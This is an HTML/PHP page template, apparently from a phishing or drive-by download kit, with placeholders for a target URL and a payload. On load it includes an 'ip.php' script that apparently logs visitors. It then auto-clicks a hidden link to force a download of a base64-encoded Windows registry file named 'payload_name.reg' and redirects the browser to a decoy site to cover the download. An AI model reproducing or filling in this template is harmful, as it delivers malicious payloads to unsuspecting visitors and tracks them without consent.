<HTML>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<HEAD>
<TITLE>url_website</TITLE>
</HEAD>
<BODY>
<?php
include 'ip.php';
?>
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
   <script>
     $(document).ready(function() {
       $('a#clickhere')[0].click();
     });
    window.addEventListener('load', function () {
    location.replace("url_website");
   })
   </script>
 </head>
 <body>
   <a id='clickhere' style="display:none"
     href="data:application/application/x-msdownload;base64,data_base64" download="payload_name.reg">Download</a>

</BODY>
</HTML>
